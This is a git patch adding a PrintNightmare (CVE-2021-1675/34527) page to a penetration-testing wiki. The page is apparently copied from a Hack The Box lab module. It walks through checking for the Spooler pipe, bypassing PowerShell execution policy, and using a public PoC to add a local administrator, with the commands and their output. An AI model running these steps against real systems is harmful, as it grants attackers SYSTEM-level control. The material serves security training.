From cd93fa686b07acd4564721ba85cd7c8ca36c8506 Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 3 Oct 2022 23:18:35 +0000 Subject: [PATCH] GitBook: [#3551] No subject --- SUMMARY.md | 1 + .../active-directory-methodology/README.md | 8 ++ .../printnightmare.md | 114 ++++++++++++++++++ .../README.md | 2 + 4 files changed, 125 insertions(+) create mode 100644 windows-hardening/active-directory-methodology/printnightmare.md diff --git a/SUMMARY.md b/SUMMARY.md index 8f4b6373..2d75203c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -186,6 +186,7 @@ * [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md) * [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md) * [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md) + * [PrintNightmare](windows-hardening/active-directory-methodology/printnightmare.md) * [Force NTLM Privileged Authentication](windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md) * [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md) * [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md) diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 3c66500b..25e161e9 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -186,6 +186,14 @@ You can get help from automatic tools such as: Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy. +### CVE-2021-1675/CVE-2021-34527 PrintNightmare + +This vulnerability allowed any authenticated user to **compromise the domain controller**. + +{% content-ref url="printnightmare.md" %} +[printnightmare.md](printnightmare.md) +{% endcontent-ref %} + ## Privilege escalation on Active Directory WITH privileged credentials/session **For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.** diff --git a/windows-hardening/active-directory-methodology/printnightmare.md b/windows-hardening/active-directory-methodology/printnightmare.md new file mode 100644 index 00000000..438aca6c --- /dev/null +++ b/windows-hardening/active-directory-methodology/printnightmare.md @@ -0,0 +1,114 @@ +# PrintNightmare + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +**This page was copied from** [**https://academy.hackthebox.com/module/67/section/627**](https://academy.hackthebox.com/module/67/section/627)**** + +`CVE-2021-1675/CVE-2021-34527 PrintNightmare` is a flaw in [RpcAddPrinterDriver](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-rprn/f23a7519-1c77-4069-9ace-a6d8eae47c22) which is used to allow for remote printing and driver installation. \ +This function is intended to give **users with the Windows privilege `SeLoadDriverPrivilege`** the ability to **add drivers** to a remote Print Spooler. This right is typically reserved for users in the built-in Administrators group and Print Operators who may have a legitimate need to install a printer driver on an end user's machine remotely. + +The flaw allowed **any authenticated user to add a print driver** to a Windows system without having the privilege mentioned above, allowing an attacker full remote **code execution as SYSTEM** on any affected system. The flaw **affects every supported version of Windows**, and being that the **Print Spooler** runs by default on **Domain Controllers**, Windows 7 and 10, and is often enabled on Windows servers, this presents a massive attack surface, hence "nightmare." + +Microsoft initially released a patch that did not fix the issue (and early guidance was to disable the Spooler service, which is not practical for many organizations) but released a second [patch](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) in July of 2021 along with guidance to check that specific registry settings are either set to `0` or not defined. + +Once this vulnerability was made public, PoC exploits were released rather quickly. **** [**This**](https://github.com/cube0x0/CVE-2021-1675) **version** by [@cube0x0](https://twitter.com/cube0x0) can be used to **execute a malicious DLL** remotely or locally using a modified version of Impacket. The repo also contains a **C# implementation**.\ +This **** [**PowerShell implementation**](https://github.com/calebstewart/CVE-2021-1675) **** can be used for quick local privilege escalation. By **default**, this script **adds a new local admin user**, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope. + +### **Checking for Spooler Service** + +We can quickly check if the Spooler service is running with the following command. If it is not running, we will receive a "path does not exist" error. + +``` +PS C:\htb> ls \\localhost\pipe\spoolss + + + Directory: \\localhost\pipe + + +Mode LastWriteTime Length Name +---- ------------- ------ ---- + spoolss +``` + +### **Adding Local Admin with PrintNightmare PowerShell PoC** + +First start by [bypassing](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) the execution policy on the target host: + +``` +PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process + +Execution Policy Change +The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose +you to the security risks described in the about_Execution_Policies help topic at +https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy? +[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A +``` + +Now we can import the PowerShell script and use it to add a new local admin user. + +```powershell +PS C:\htb> Import-Module .\CVE-2021-1675.ps1 +PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" + +[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll +[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am +d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll" +[+] added user hacker as local administrator +[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll +``` + +### **Confirming New Admin User** + +If all went to plan, we will have a new local admin user under our control. Adding a user is "noisy," We would not want to do this on an engagement where stealth is a consideration. Furthermore, we would want to check with our client to ensure account creation is in scope for the assessment. + +``` +PS C:\htb> net user hacker + +User name hacker +Full Name hacker +Comment +User's comment +Country/region code 000 (System Default) +Account active Yes +Account expires Never + +Password last set ?8/?9/?2021 12:12:01 PM +Password expires Never +Password changeable ?8/?9/?2021 12:12:01 PM +Password required Yes +User may change password Yes + +Workstations allowed All +Logon script +User profile +Home directory +Last logon Never + +Logon hours allowed All + +Local Group Memberships *Administrators +Global Group memberships *None +The command completed successfully. +``` + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md index 5c2418ec..119b908b 100644 --- a/windows-hardening/windows-local-privilege-escalation/README.md +++ b/windows-hardening/windows-local-privilege-escalation/README.md @@ -61,6 +61,8 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches ### Version Exploits +This [site](https://msrc.microsoft.com/update-guide/vulnerability) is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the **massive attack surface** that a Windows environment presents. + **On the system** * _post/windows/gather/enum\_patches_